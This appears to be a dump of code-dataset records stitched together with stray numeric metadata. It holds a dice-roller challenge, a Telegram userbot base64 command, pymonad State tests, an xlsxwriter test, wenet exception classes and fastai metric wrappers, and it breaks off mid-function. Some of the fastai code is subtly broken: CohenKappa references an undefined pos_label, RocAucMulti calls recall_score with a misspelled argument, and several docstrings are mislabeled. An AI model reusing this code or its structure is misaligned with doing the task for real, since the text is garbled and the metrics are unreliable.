Sample Use ========== echo -e "3d6\n10d13\n2d5" | python3 384.py Description =========== I love playing D&D with my friends, and my favorite part is creating character sheets (my DM is notorious for killing us all off by level 3 or so). One major part of making character sheets is rolling the character's stats. Sadly, I have lost all my dice, so I'm asking for your help to make a dice roller for me to use! Formal Inputs & Outputs ======================= Input description ----------------- Your input will contain one or more lines, where each line will be in the form of "NdM"; for example: 3d6 4d12 1d10 5d4 If you've ever played D&D you probably recognize those, but for the rest of you, this is what those mean: The first number is the number of dice to roll, the d just means "dice", it's just used to split up the two numbers, and the second number is how many sides the dice have. So the above example of "3d6" means "roll 3 6-sided dice". Also, just in case you didn't know, in D&D, not all the dice we roll are the normal cubes. A d6 is a cube, because it's a 6-sided die, but a d20 has twenty sides, so it looks a lot closer to a ball than a cube. The first number, the number of dice to roll, can be any integer between 1 and 100, inclusive. The second number, the number of sides of the dice, can be any integer between 2 and 100, inclusive. Output description ------------------ You should output the sum of all the rolls of that specified die, each on their own line. so if your input is "3d6", the output should look something like 14 Just a single number, you rolled 3 6-sided dice, and they added up to 14. Challenge Input 5d12 6d4 1d2 1d8 3d6 4d20 100d100 Challenge Output [some number between 5 and 60, probably closer to 32 or 33] [some number between 6 and 24, probably around 15] [you get the idea] [...] Notes/Hints =========== A dice roll is basically the same as picking a random number between 1 and 6 (or 12, or 20, or however many sides the die has). You should use some way of randomly selecting a number within a range based off of your input. Many common languages have random number generators available, but at least a few of them will give the same "random" numbers every time you use the program. In my opinion that's not very random. If you run your code 3+ times with the same inputs and it gives the same outputs, that wouldn't be super useful for a game of D&D, would it? If that happens with your code, try to find a way around that. I'm guessing for some of the newer folks, this might be one of the trickier parts to get correct. Don't just multiply your roll by the number of dice, please. I don't know if any of you were thinking about doing that, but I was. The problem is that if you do that, it eliminates a lot of possible values. For example, there's no way to roll 14 from 3d6 if you just roll it once and multiply by 3. Setting up a loop to roll each die is probably your best bet here. Bonus ===== In addition to the sum of all dice rolls for your output, print out the result of each roll on the same line, using a format that looks something like 14: 6 3 5 22: 10 7 1 4 9: 9 11: 3 2 2 1 3 You could also try setting it up so that you can manually input more rolls. that way you can just leave the program open and every time you want to roll more dice, you just type it in and hit enter. Given nds, interpret this as n `num_dice` with `s` sides.
3.302452
3
userbot/modules/misc/b64.py
ZJRDroid/PaperplaneRemix
0
6627927
import pybase64 from ..help import add_help_item from userbot.events import register from userbot.utils.tgdoc import * @register(outgoing=True, pattern=r"^\.b64\s+(en|de)(?:\s+(.*))?") async def endecrypt(e): """ For .b64 command, find the base64 encoding of the given string. """ reply_message = await e.get_reply_message() text = e.pattern_match.group(2) or reply_message.message output = Section(SubSection(Bold("Input"), Code(text), indent=0), indent=0) if e.pattern_match.group(1) == "en": lething = str(pybase64.b64encode(bytes(text, "utf-8")))[2:] output += SubSection(Bold("Encoded"), Code(lething[:-1]), indent=0) else: lething = str(pybase64.b64decode(bytes(text, "utf-8"), validate=True))[2:] output += SubSection(Bold("Decoded"), Code(lething[:-1]), indent=0) await e.edit(str(output)) add_help_item( ".b64", "Misc", "Base64 encode/decode the message or replied to message.", """ `.b64 (en|de) (message)` Or, in reply to a message `.b64 (en|de)` """ )
import pybase64 from ..help import add_help_item from userbot.events import register from userbot.utils.tgdoc import * @register(outgoing=True, pattern=r"^\.b64\s+(en|de)(?:\s+(.*))?") async def endecrypt(e): """ For .b64 command, find the base64 encoding of the given string. """ reply_message = await e.get_reply_message() text = e.pattern_match.group(2) or reply_message.message output = Section(SubSection(Bold("Input"), Code(text), indent=0), indent=0) if e.pattern_match.group(1) == "en": lething = str(pybase64.b64encode(bytes(text, "utf-8")))[2:] output += SubSection(Bold("Encoded"), Code(lething[:-1]), indent=0) else: lething = str(pybase64.b64decode(bytes(text, "utf-8"), validate=True))[2:] output += SubSection(Bold("Decoded"), Code(lething[:-1]), indent=0) await e.edit(str(output)) add_help_item( ".b64", "Misc", "Base64 encode/decode the message or replied to message.", """ `.b64 (en|de) (message)` Or, in reply to a message `.b64 (en|de)` """ )
en
0.390855
For .b64 command, find the base64 encoding of the given string. `.b64 (en|de) (message)` Or, in reply to a message `.b64 (en|de)`
2.515272
3
tests/test_state.py
wboxx1/boxx-pymonad
0
6627928
# -------------------------------------------------------- # (c) Copyright 2014, 2020 by <NAME>. # Licensed under BSD 3-clause licence. # -------------------------------------------------------- import unittest import common_tests import pymonad from pymonad.state import _State class EqState(pymonad.monad.MonadAlias, _State): def __eq__(self, other): try: return self.run(0) == other.run(0) except: return self.run(0) == other class StateTests(unittest.TestCase): def test_insert(self): self.assertEqual( EqState.insert(2), (2, 0) ) class StateFunctor(common_tests.FunctorTests, unittest.TestCase): def setUp(self): self._class = EqState class StateApplicative(common_tests.ApplicativeTests, unittest.TestCase): def setUp(self): self._class = EqState class StateMonad(common_tests.MonadTests, unittest.TestCase): def setUp(self): self._class = EqState class StateThen(common_tests.ThenTests, unittest.TestCase): def setUp(self): self._class = EqState
# -------------------------------------------------------- # (c) Copyright 2014, 2020 by <NAME>. # Licensed under BSD 3-clause licence. # -------------------------------------------------------- import unittest import common_tests import pymonad from pymonad.state import _State class EqState(pymonad.monad.MonadAlias, _State): def __eq__(self, other): try: return self.run(0) == other.run(0) except: return self.run(0) == other class StateTests(unittest.TestCase): def test_insert(self): self.assertEqual( EqState.insert(2), (2, 0) ) class StateFunctor(common_tests.FunctorTests, unittest.TestCase): def setUp(self): self._class = EqState class StateApplicative(common_tests.ApplicativeTests, unittest.TestCase): def setUp(self): self._class = EqState class StateMonad(common_tests.MonadTests, unittest.TestCase): def setUp(self): self._class = EqState class StateThen(common_tests.ThenTests, unittest.TestCase): def setUp(self): self._class = EqState
en
0.514836
# -------------------------------------------------------- # (c) Copyright 2014, 2020 by <NAME>. # Licensed under BSD 3-clause licence. # --------------------------------------------------------
2.464656
2
webindexer/__init__.py
rr-/pyindexer
3
6627929
from .indexer import application
from .indexer import application
none
1
1.088134
1
xlsxwriter/test/comparison/test_set_row03.py
Rippling/XlsxWriter-1
0
6627930
############################################################################### # # Tests for XlsxWriter. # # SPDX-License-Identifier: BSD-2-Clause # Copyright (c), 2013-2019, <NAME>, <EMAIL> # from ..excel_comparison_test import ExcelComparisonTest from ...workbook import Workbook class TestCompareXLSXFiles(ExcelComparisonTest): """ Test file created by XlsxWriter against a file created by Excel. """ def setUp(self): self.set_filename('set_row03.xlsx') def test_create_file(self): """Test the creation of a simple XlsxWriter file.""" workbook = Workbook(self.got_filename) worksheet = workbook.add_worksheet() worksheet.set_row(0, 0.75) worksheet.set_row(1, 1.50) worksheet.set_row(2, 2.25) worksheet.set_row(3, 3) worksheet.set_row(11, 9) worksheet.set_row(12, 9.75) worksheet.set_row(13, 10.50) worksheet.set_row(14, 11.25) worksheet.set_row(18, 14.25) worksheet.set_row(20, 15.75, None, {'hidden': True}) worksheet.set_row(21, 16.50) workbook.close() self.assertExcelEqual()
############################################################################### # # Tests for XlsxWriter. # # SPDX-License-Identifier: BSD-2-Clause # Copyright (c), 2013-2019, <NAME>, <EMAIL> # from ..excel_comparison_test import ExcelComparisonTest from ...workbook import Workbook class TestCompareXLSXFiles(ExcelComparisonTest): """ Test file created by XlsxWriter against a file created by Excel. """ def setUp(self): self.set_filename('set_row03.xlsx') def test_create_file(self): """Test the creation of a simple XlsxWriter file.""" workbook = Workbook(self.got_filename) worksheet = workbook.add_worksheet() worksheet.set_row(0, 0.75) worksheet.set_row(1, 1.50) worksheet.set_row(2, 2.25) worksheet.set_row(3, 3) worksheet.set_row(11, 9) worksheet.set_row(12, 9.75) worksheet.set_row(13, 10.50) worksheet.set_row(14, 11.25) worksheet.set_row(18, 14.25) worksheet.set_row(20, 15.75, None, {'hidden': True}) worksheet.set_row(21, 16.50) workbook.close() self.assertExcelEqual()
en
0.410052
############################################################################### # # Tests for XlsxWriter. # # SPDX-License-Identifier: BSD-2-Clause # Copyright (c), 2013-2019, <NAME>, <EMAIL> # Test file created by XlsxWriter against a file created by Excel. Test the creation of a simple XlsxWriter file.
2.640836
3
src/wenet/interface/exceptions.py
Dyuko/common-models-py
0
6627931
<reponame>Dyuko/common-models-py from __future__ import absolute_import, annotations class AuthenticationException(ValueError): def __init__(self, interface: str, http_status_code: int, server_response: str) -> None: super().__init__(f"Not a valid authentication for the [{interface}] interface. Request has return a code [{http_status_code}] with content [{server_response}]") self.http_status_code = http_status_code self.server_response = server_response self.message = f"Not a valid authentication for the [{interface}] interface. Request has return a code [{http_status_code}] with content [{server_response}]" class NotFound(ValueError): def __init__(self, object_type: str, object_id: str, http_status_code: int, server_response: str) -> None: super().__init__(f"{object_type} with [{object_id}] does not exist. Request has return a code [{http_status_code}] with content [{server_response}]") self.http_status_code = http_status_code self.server_response = server_response self.message = f"{object_type} with [{object_id}] does not exist. Request has return a code [{http_status_code}] with content [{server_response}]" class CreationError(ValueError): def __init__(self, http_status_code: int, server_response: str) -> None: super().__init__(f"Request has return a code [{http_status_code}] with content [{server_response}]") self.http_status_code = http_status_code self.server_response = server_response self.message = f"Request has return a code [{http_status_code}] with content [{server_response}]" class RefreshTokenExpiredError(Exception): def __init__(self, *args) -> None: super().__init__(*args)
from __future__ import absolute_import, annotations class AuthenticationException(ValueError): def __init__(self, interface: str, http_status_code: int, server_response: str) -> None: super().__init__(f"Not a valid authentication for the [{interface}] interface. Request has return a code [{http_status_code}] with content [{server_response}]") self.http_status_code = http_status_code self.server_response = server_response self.message = f"Not a valid authentication for the [{interface}] interface. Request has return a code [{http_status_code}] with content [{server_response}]" class NotFound(ValueError): def __init__(self, object_type: str, object_id: str, http_status_code: int, server_response: str) -> None: super().__init__(f"{object_type} with [{object_id}] does not exist. Request has return a code [{http_status_code}] with content [{server_response}]") self.http_status_code = http_status_code self.server_response = server_response self.message = f"{object_type} with [{object_id}] does not exist. Request has return a code [{http_status_code}] with content [{server_response}]" class CreationError(ValueError): def __init__(self, http_status_code: int, server_response: str) -> None: super().__init__(f"Request has return a code [{http_status_code}] with content [{server_response}]") self.http_status_code = http_status_code self.server_response = server_response self.message = f"Request has return a code [{http_status_code}] with content [{server_response}]" class RefreshTokenExpiredError(Exception): def __init__(self, *args) -> None: super().__init__(*args)
none
1
2.655267
3
dev/fastai2/metrics.py
anhquan0412/fastai_dev
380
6627932
<gh_stars>100-1000 #AUTOGENERATED! DO NOT EDIT! File to edit: dev/13a_metrics.ipynb (unless otherwise specified). __all__ = ['AccumMetric', 'skm_to_fastai', 'optim_metric', 'accuracy', 'error_rate', 'top_k_accuracy', 'APScore', 'BalancedAccuracy', 'BrierScore', 'CohenKappa', 'F1Score', 'FBeta', 'HammingLoss', 'Jaccard', 'MatthewsCorrCoef', 'Precision', 'Recall', 'RocAuc', 'Perplexity', 'perplexity', 'accuracy_multi', 'APScoreMulti', 'BrierScoreMulti', 'F1ScoreMulti', 'FBetaMulti', 'HammingLossMulti', 'JaccardMulti', 'MatthewsCorrCoefMulti', 'PrecisionMulti', 'RecallMulti', 'RocAucMulti', 'mse', 'rmse', 'mae', 'msle', 'exp_rmspe', 'ExplainedVariance', 'R2Score', 'foreground_acc', 'Dice', 'JaccardCoeff'] #Cell from .test import * from .data.all import * from .optimizer import * from .learner import * #Cell import sklearn.metrics as skm #Cell class AccumMetric(Metric): "Stores predictions and targets on CPU in accumulate to perform final calculations with `func`." def __init__(self, func, dim_argmax=None, sigmoid=False, thresh=None, to_np=False, invert_arg=False, flatten=True, **kwargs): store_attr(self,'func,dim_argmax,sigmoid,thresh,flatten') self.to_np,self.invert_args,self.kwargs = to_np,invert_arg,kwargs def reset(self): self.targs,self.preds = [],[] def accumulate(self, learn): pred = learn.pred.argmax(dim=self.dim_argmax) if self.dim_argmax else learn.pred if self.sigmoid: pred = torch.sigmoid(pred) if self.thresh: pred = (pred >= self.thresh) targ = learn.y pred,targ = to_detach(pred),to_detach(targ) if self.flatten: pred,targ = flatten_check(pred,targ) self.preds.append(pred) self.targs.append(targ) @property def value(self): if len(self.preds) == 0: return preds,targs = torch.cat(self.preds),torch.cat(self.targs) if self.to_np: preds,targs = preds.numpy(),targs.numpy() return self.func(targs, preds, **self.kwargs) if self.invert_args else self.func(preds, targs, **self.kwargs) @property def name(self): return self.func.func.__name__ if hasattr(self.func, 'func') else self.func.__name__ #Cell def skm_to_fastai(func, is_class=True, thresh=None, axis=-1, sigmoid=None, **kwargs): "Convert `func` from sklearn.metrics to a fastai metric" dim_argmax = axis if is_class and thresh is None else None sigmoid = sigmoid if sigmoid is not None else (is_class and thresh is not None) return AccumMetric(func, dim_argmax=dim_argmax, sigmoid=sigmoid, thresh=thresh, to_np=True, invert_arg=True, **kwargs) #Cell def optim_metric(f, argname, bounds, tol=0.01, do_neg=True, get_x=False): "Replace metric `f` with a version that optimizes argument `argname`" def _f(preds, targs): def minfunc(x): kwargs = {argname:x} res = f(preds, targs, **kwargs) return -res if do_neg else res optres = scipy.optimize.minimize_scalar(minfunc, bounds=bounds, method='bounded', options={'xatol':0.01}) fun = -optres.fun if do_neg else optres.fun return (fun,optres.x) if get_x else fun _f.__name__ = f'opt_{f.__name__}' return _f #Cell def accuracy(inp, targ, axis=-1): "Compute accuracy with `targ` when `pred` is bs * n_classes" pred,targ = flatten_check(inp.argmax(dim=axis), targ) return (pred == targ).float().mean() #Cell def error_rate(inp, targ, axis=-1): "1 - `accuracy`" return 1 - accuracy(inp, targ, axis=axis) #Cell def top_k_accuracy(inp, targ, k=5, axis=-1): "Computes the Top-k accuracy (`targ` is in the top `k` predictions of `inp`)" inp = inp.topk(k=k, dim=axis)[1] targ = targ.unsqueeze(dim=axis).expand_as(inp) return (inp == targ).sum(dim=-1).float().mean() #Cell def APScore(axis=-1, average='macro', pos_label=1, sample_weight=None): "Average Precision for single-label classification problems" return skm_to_fastai(skm.average_precision_score, axis=axis, average=average, pos_label=pos_label, sample_weight=sample_weight) #Cell def BalancedAccuracy(axis=-1, sample_weight=None, adjusted=False): "Balanced Accuracy for single-label binary classification problems" return skm_to_fastai(skm.balanced_accuracy_score, axis=axis, sample_weight=sample_weight, adjusted=adjusted) #Cell def BrierScore(axis=-1, sample_weight=None, pos_label=None): "Brier score for single-label classification problems" return skm_to_fastai(skm.brier_score_loss, axis=axis, sample_weight=sample_weight, pos_label=pos_label) #Cell def CohenKappa(axis=-1, labels=None, weights=None, sample_weight=None): "Cohen kappa for single-label classification problems" return skm_to_fastai(skm.cohen_kappa_score, axis=axis, sample_weight=sample_weight, pos_label=pos_label) #Cell def F1Score(axis=-1, labels=None, pos_label=1, average='binary', sample_weight=None): "F1 score for single-label classification problems" return skm_to_fastai(skm.f1_score, axis=axis, labels=labels, pos_label=pos_label, average=average, sample_weight=sample_weight) #Cell def FBeta(beta, axis=-1, labels=None, pos_label=1, average='binary', sample_weight=None): "FBeta score with `beta` for single-label classification problems" return skm_to_fastai(skm.fbeta_score, axis=axis, beta=beta, labels=labels, pos_label=pos_label, average=average, sample_weight=sample_weight) #Cell def HammingLoss(axis=-1, labels=None, sample_weight=None): "Cohen kappa for single-label classification problems" return skm_to_fastai(skm.hamming_loss, axis=axis, labels=labels, sample_weight=sample_weight) #Cell def Jaccard(axis=-1, labels=None, pos_label=1, average='binary', sample_weight=None): "Jaccard score for single-label classification problems" return skm_to_fastai(skm.jaccard_similarity_score, axis=axis, labels=labels, pos_label=pos_label, average=average, sample_weight=sample_weight) #Cell def MatthewsCorrCoef(axis=-1, sample_weight=None): "Matthews correlation coefficient for single-label binary classification problems" return skm_to_fastai(skm.matthews_corrcoef, axis=axis, sample_weight=sample_weight) #Cell def Precision(axis=-1, labels=None, pos_label=1, average='binary', sample_weight=None): "Precision for single-label classification problems" return skm_to_fastai(skm.precision_score, axis=axis, labels=labels, pos_label=pos_label, average=average, sample_weight=sample_weight) #Cell def Recall(axis=-1, labels=None, pos_label=1, average='binary', sample_weight=None): "Recall for single-label classification problems" return skm_to_fastai(skm.recall_score, axis=axis, labels=labels, pos_label=pos_label, average=average, sample_weight=sample_weight) #Cell def RocAuc(axis=-1, average='macro', sample_weight=None, max_fpr=None): "Area Under the Receiver Operating Characteristic Curve for single-label binary classification problems" return skm_to_fastai(skm.roc_auc_score, axis=axis, average=average, sample_weight=sample_weight, max_fpr=max_fpr) #Cell class Perplexity(AvgLoss): "Perplexity (exponential of cross-entropy loss) for Language Models" @property def value(self): return torch.exp(self.total/self.count) if self.count != 0 else None @property def name(self): return "perplexity" perplexity = Perplexity() #Cell def accuracy_multi(inp, targ, thresh=0.5, sigmoid=True): "Compute accuracy when `inp` and `targ` are the same size." inp,targ = flatten_check(inp,targ) if sigmoid: inp = inp.sigmoid() return ((inp>thresh)==targ.bool()).float().mean() #Cell def APScoreMulti(thresh=0.5, sigmoid=True, average='macro', pos_label=1, sample_weight=None): "Average Precision for multi-label classification problems" return skm_to_fastai(skm.average_precision_score, thresh=thresh, sigmoid=sigmoid, flatten=False, average=average, pos_label=pos_label, sample_weight=sample_weight) #Cell def BrierScoreMulti(thresh=0.5, sigmoid=True, sample_weight=None, pos_label=None): "Brier score for multi-label classification problems" return skm_to_fastai(skm.brier_score_loss, thresh=thresh, sigmoid=sigmoid, flatten=False, sample_weight=sample_weight, pos_label=pos_label) #Cell def F1ScoreMulti(thresh=0.5, sigmoid=True, labels=None, pos_label=1, average='macro', sample_weight=None): "F1 score for multi-label classification problems" return skm_to_fastai(skm.f1_score, thresh=thresh, sigmoid=sigmoid, flatten=False, labels=labels, pos_label=pos_label, average=average, sample_weight=sample_weight) #Cell def FBetaMulti(beta, thresh=0.5, sigmoid=True, labels=None, pos_label=1, average='macro', sample_weight=None): "FBeta score with `beta` for multi-label classification problems" return skm_to_fastai(skm.fbeta_score, thresh=thresh, sigmoid=sigmoid, flatten=False, beta=beta, labels=labels, pos_label=pos_label, average=average, sample_weight=sample_weight) #Cell def HammingLossMulti(thresh=0.5, sigmoid=True, labels=None, sample_weight=None): "Cohen kappa for multi-label classification problems" return skm_to_fastai(skm.hamming_loss, thresh=thresh, sigmoid=sigmoid, flatten=False, labels=labels, sample_weight=sample_weight) #Cell def JaccardMulti(thresh=0.5, sigmoid=True, labels=None, pos_label=1, average='macro', sample_weight=None): "Jaccard score for multi-label classification problems" return skm_to_fastai(skm.jaccard_similarity_score, thresh=thresh, sigmoid=sigmoid, flatten=False, labels=labels, pos_label=pos_label, average=average, sample_weight=sample_weight) #Cell def MatthewsCorrCoefMulti(thresh=0.5, sigmoid=True, sample_weight=None): "Matthews correlation coefficient for multi-label classification problems" return skm_to_fastai(skm.matthews_corrcoef, thresh=thresh, sigmoid=sigmoid, flatten=False, sample_weight=sample_weight) #Cell def PrecisionMulti(thresh=0.5, sigmoid=True, labels=None, pos_label=1, average='macro', sample_weight=None): "Precision for multi-label classification problems" return skm_to_fastai(skm.precision_score, thresh=thresh, sigmoid=sigmoid, flatten=False, labels=labels, pos_label=pos_label, average=average, sample_weight=sample_weight) #Cell def RecallMulti(thresh=0.5, sigmoid=True, labels=None, pos_label=1, average='macro', sample_weight=None): "Recall for multi-label classification problems" return skm_to_fastai(skm.recall_score, thresh=thresh, sigmoid=sigmoid, flatten=False, labels=labels, pos_label=pos_label, average=average, sample_weight=sample_weight) #Cell def RocAucMulti(thresh=0.5, sigmoid=True, average='macro', sample_weight=None, max_fpr=None): "Area Under the Receiver Operating Characteristic Curve for multi-label binary classification problems" return skm_to_fastai(skm.recall_score, thresh=thresh, sigmoid=sigmoid, flatten=False, laverage=average, sample_weight=sample_weight, max_fpr=max_fpr) #Cell def mse(inp,targ): "Mean squared error between `inp` and `targ`." return F.mse_loss(*flatten_check(inp,targ)) #Cell def _rmse(inp, targ): return torch.sqrt(F.mse_loss(inp, targ)) rmse = AccumMetric(_rmse) rmse.__doc__ = "Root mean squared error" #Cell def mae(inp,targ): "Mean absolute error between `inp` and `targ`." inp,targ = flatten_check(inp,targ) return torch.abs(inp - targ).mean() #Cell def msle(inp, targ): "Mean squared logarithmic error between `inp` and `targ`." inp,targ = flatten_check(inp,targ) return F.mse_loss(torch.log(1 + inp), torch.log(1 + targ)) #Cell def _exp_rmspe(inp,targ): inp,targ = torch.exp(inp),torch.exp(targ) return torch.sqrt(((targ - inp)/targ).pow(2).mean()) exp_rmspe = AccumMetric(_exp_rmspe) exp_rmspe.__doc__ = "Root mean square percentage error of the exponential of predictions and targets" #Cell def ExplainedVariance(sample_weight=None): "Explained variance betzeen predictions and targets" return skm_to_fastai(skm.explained_variance_score, is_class=False, sample_weight=sample_weight) #Cell def R2Score(sample_weight=None): "R2 score betzeen predictions and targets" return skm_to_fastai(skm.r2_score, is_class=False, sample_weight=sample_weight) #Cell def foreground_acc(inp, targ, bkg_idx=0, axis=1): "Computes non-background accuracy for multiclass segmentation" targ = targ.squeeze(1) mask = targ != bkg_idx return (inp.argmax(dim=axis)[mask]==targ[mask]).float().mean() #Cell class Dice(Metric): "Dice coefficient metric for binary target in segmentation" def __init__(self, axis=1): self.axis = axis def reset(self): self.inter,self.union = 0,0 def accumulate(self, learn): pred,targ = flatten_check(learn.pred.argmax(dim=self.axis), learn.y) self.inter += (pred*targ).float().sum().item() self.union += (pred+targ).float().sum().item() @property def value(self): return 2. * self.inter/self.union if self.union > 0 else None #Cell class JaccardCoeff(Dice): "Implemetation of the jaccard coefficient that is lighter in RAM" @property def value(self): return self.inter/(self.union-self.inter) if self.union > 0 else None
#AUTOGENERATED! DO NOT EDIT! File to edit: dev/13a_metrics.ipynb (unless otherwise specified). __all__ = ['AccumMetric', 'skm_to_fastai', 'optim_metric', 'accuracy', 'error_rate', 'top_k_accuracy', 'APScore', 'BalancedAccuracy', 'BrierScore', 'CohenKappa', 'F1Score', 'FBeta', 'HammingLoss', 'Jaccard', 'MatthewsCorrCoef', 'Precision', 'Recall', 'RocAuc', 'Perplexity', 'perplexity', 'accuracy_multi', 'APScoreMulti', 'BrierScoreMulti', 'F1ScoreMulti', 'FBetaMulti', 'HammingLossMulti', 'JaccardMulti', 'MatthewsCorrCoefMulti', 'PrecisionMulti', 'RecallMulti', 'RocAucMulti', 'mse', 'rmse', 'mae', 'msle', 'exp_rmspe', 'ExplainedVariance', 'R2Score', 'foreground_acc', 'Dice', 'JaccardCoeff'] #Cell from .test import * from .data.all import * from .optimizer import * from .learner import * #Cell import sklearn.metrics as skm #Cell class AccumMetric(Metric): "Stores predictions and targets on CPU in accumulate to perform final calculations with `func`." def __init__(self, func, dim_argmax=None, sigmoid=False, thresh=None, to_np=False, invert_arg=False, flatten=True, **kwargs): store_attr(self,'func,dim_argmax,sigmoid,thresh,flatten') self.to_np,self.invert_args,self.kwargs = to_np,invert_arg,kwargs def reset(self): self.targs,self.preds = [],[] def accumulate(self, learn): pred = learn.pred.argmax(dim=self.dim_argmax) if self.dim_argmax else learn.pred if self.sigmoid: pred = torch.sigmoid(pred) if self.thresh: pred = (pred >= self.thresh) targ = learn.y pred,targ = to_detach(pred),to_detach(targ) if self.flatten: pred,targ = flatten_check(pred,targ) self.preds.append(pred) self.targs.append(targ) @property def value(self): if len(self.preds) == 0: return preds,targs = torch.cat(self.preds),torch.cat(self.targs) if self.to_np: preds,targs = preds.numpy(),targs.numpy() return self.func(targs, preds, **self.kwargs) if self.invert_args else self.func(preds, targs, **self.kwargs) @property def name(self): return self.func.func.__name__ if hasattr(self.func, 'func') else self.func.__name__ #Cell def skm_to_fastai(func, is_class=True, thresh=None, axis=-1, sigmoid=None, **kwargs): "Convert `func` from sklearn.metrics to a fastai metric" dim_argmax = axis if is_class and thresh is None else None sigmoid = sigmoid if sigmoid is not None else (is_class and thresh is not None) return AccumMetric(func, dim_argmax=dim_argmax, sigmoid=sigmoid, thresh=thresh, to_np=True, invert_arg=True, **kwargs) #Cell def optim_metric(f, argname, bounds, tol=0.01, do_neg=True, get_x=False): "Replace metric `f` with a version that optimizes argument `argname`" def _f(preds, targs): def minfunc(x): kwargs = {argname:x} res = f(preds, targs, **kwargs) return -res if do_neg else res optres = scipy.optimize.minimize_scalar(minfunc, bounds=bounds, method='bounded', options={'xatol':0.01}) fun = -optres.fun if do_neg else optres.fun return (fun,optres.x) if get_x else fun _f.__name__ = f'opt_{f.__name__}' return _f #Cell def accuracy(inp, targ, axis=-1): "Compute accuracy with `targ` when `pred` is bs * n_classes" pred,targ = flatten_check(inp.argmax(dim=axis), targ) return (pred == targ).float().mean() #Cell def error_rate(inp, targ, axis=-1): "1 - `accuracy`" return 1 - accuracy(inp, targ, axis=axis) #Cell def top_k_accuracy(inp, targ, k=5, axis=-1): "Computes the Top-k accuracy (`targ` is in the top `k` predictions of `inp`)" inp = inp.topk(k=k, dim=axis)[1] targ = targ.unsqueeze(dim=axis).expand_as(inp) return (inp == targ).sum(dim=-1).float().mean() #Cell def APScore(axis=-1, average='macro', pos_label=1, sample_weight=None): "Average Precision for single-label classification problems" return skm_to_fastai(skm.average_precision_score, axis=axis, average=average, pos_label=pos_label, sample_weight=sample_weight) #Cell def BalancedAccuracy(axis=-1, sample_weight=None, adjusted=False): "Balanced Accuracy for single-label binary classification problems" return skm_to_fastai(skm.balanced_accuracy_score, axis=axis, sample_weight=sample_weight, adjusted=adjusted) #Cell def BrierScore(axis=-1, sample_weight=None, pos_label=None): "Brier score for single-label classification problems" return skm_to_fastai(skm.brier_score_loss, axis=axis, sample_weight=sample_weight, pos_label=pos_label) #Cell def CohenKappa(axis=-1, labels=None, weights=None, sample_weight=None): "Cohen kappa for single-label classification problems" return skm_to_fastai(skm.cohen_kappa_score, axis=axis, sample_weight=sample_weight, pos_label=pos_label) #Cell def F1Score(axis=-1, labels=None, pos_label=1, average='binary', sample_weight=None): "F1 score for single-label classification problems" return skm_to_fastai(skm.f1_score, axis=axis, labels=labels, pos_label=pos_label, average=average, sample_weight=sample_weight) #Cell def FBeta(beta, axis=-1, labels=None, pos_label=1, average='binary', sample_weight=None): "FBeta score with `beta` for single-label classification problems" return skm_to_fastai(skm.fbeta_score, axis=axis, beta=beta, labels=labels, pos_label=pos_label, average=average, sample_weight=sample_weight) #Cell def HammingLoss(axis=-1, labels=None, sample_weight=None): "Cohen kappa for single-label classification problems" return skm_to_fastai(skm.hamming_loss, axis=axis, labels=labels, sample_weight=sample_weight) #Cell def Jaccard(axis=-1, labels=None, pos_label=1, average='binary', sample_weight=None): "Jaccard score for single-label classification problems" return skm_to_fastai(skm.jaccard_similarity_score, axis=axis, labels=labels, pos_label=pos_label, average=average, sample_weight=sample_weight) #Cell def MatthewsCorrCoef(axis=-1, sample_weight=None): "Matthews correlation coefficient for single-label binary classification problems" return skm_to_fastai(skm.matthews_corrcoef, axis=axis, sample_weight=sample_weight) #Cell def Precision(axis=-1, labels=None, pos_label=1, average='binary', sample_weight=None): "Precision for single-label classification problems" return skm_to_fastai(skm.precision_score, axis=axis, labels=labels, pos_label=pos_label, average=average, sample_weight=sample_weight) #Cell def Recall(axis=-1, labels=None, pos_label=1, average='binary', sample_weight=None): "Recall for single-label classification problems" return skm_to_fastai(skm.recall_score, axis=axis, labels=labels, pos_label=pos_label, average=average, sample_weight=sample_weight) #Cell def RocAuc(axis=-1, average='macro', sample_weight=None, max_fpr=None): "Area Under the Receiver Operating Characteristic Curve for single-label binary classification problems" return skm_to_fastai(skm.roc_auc_score, axis=axis, average=average, sample_weight=sample_weight, max_fpr=max_fpr) #Cell class Perplexity(AvgLoss): "Perplexity (exponential of cross-entropy loss) for Language Models" @property def value(self): return torch.exp(self.total/self.count) if self.count != 0 else None @property def name(self): return "perplexity" perplexity = Perplexity() #Cell def accuracy_multi(inp, targ, thresh=0.5, sigmoid=True): "Compute accuracy when `inp` and `targ` are the same size." inp,targ = flatten_check(inp,targ) if sigmoid: inp = inp.sigmoid() return ((inp>thresh)==targ.bool()).float().mean() #Cell def APScoreMulti(thresh=0.5, sigmoid=True, average='macro', pos_label=1, sample_weight=None): "Average Precision for multi-label classification problems" return skm_to_fastai(skm.average_precision_score, thresh=thresh, sigmoid=sigmoid, flatten=False, average=average, pos_label=pos_label, sample_weight=sample_weight) #Cell def BrierScoreMulti(thresh=0.5, sigmoid=True, sample_weight=None, pos_label=None): "Brier score for multi-label classification problems" return skm_to_fastai(skm.brier_score_loss, thresh=thresh, sigmoid=sigmoid, flatten=False, sample_weight=sample_weight, pos_label=pos_label) #Cell def F1ScoreMulti(thresh=0.5, sigmoid=True, labels=None, pos_label=1, average='macro', sample_weight=None): "F1 score for multi-label classification problems" return skm_to_fastai(skm.f1_score, thresh=thresh, sigmoid=sigmoid, flatten=False, labels=labels, pos_label=pos_label, average=average, sample_weight=sample_weight) #Cell def FBetaMulti(beta, thresh=0.5, sigmoid=True, labels=None, pos_label=1, average='macro', sample_weight=None): "FBeta score with `beta` for multi-label classification problems" return skm_to_fastai(skm.fbeta_score, thresh=thresh, sigmoid=sigmoid, flatten=False, beta=beta, labels=labels, pos_label=pos_label, average=average, sample_weight=sample_weight) #Cell def HammingLossMulti(thresh=0.5, sigmoid=True, labels=None, sample_weight=None): "Cohen kappa for multi-label classification problems" return skm_to_fastai(skm.hamming_loss, thresh=thresh, sigmoid=sigmoid, flatten=False, labels=labels, sample_weight=sample_weight) #Cell def JaccardMulti(thresh=0.5, sigmoid=True, labels=None, pos_label=1, average='macro', sample_weight=None): "Jaccard score for multi-label classification problems" return skm_to_fastai(skm.jaccard_similarity_score, thresh=thresh, sigmoid=sigmoid, flatten=False, labels=labels, pos_label=pos_label, average=average, sample_weight=sample_weight) #Cell def MatthewsCorrCoefMulti(thresh=0.5, sigmoid=True, sample_weight=None): "Matthews correlation coefficient for multi-label classification problems" return skm_to_fastai(skm.matthews_corrcoef, thresh=thresh, sigmoid=sigmoid, flatten=False, sample_weight=sample_weight) #Cell def PrecisionMulti(thresh=0.5, sigmoid=True, labels=None, pos_label=1, average='macro', sample_weight=None): "Precision 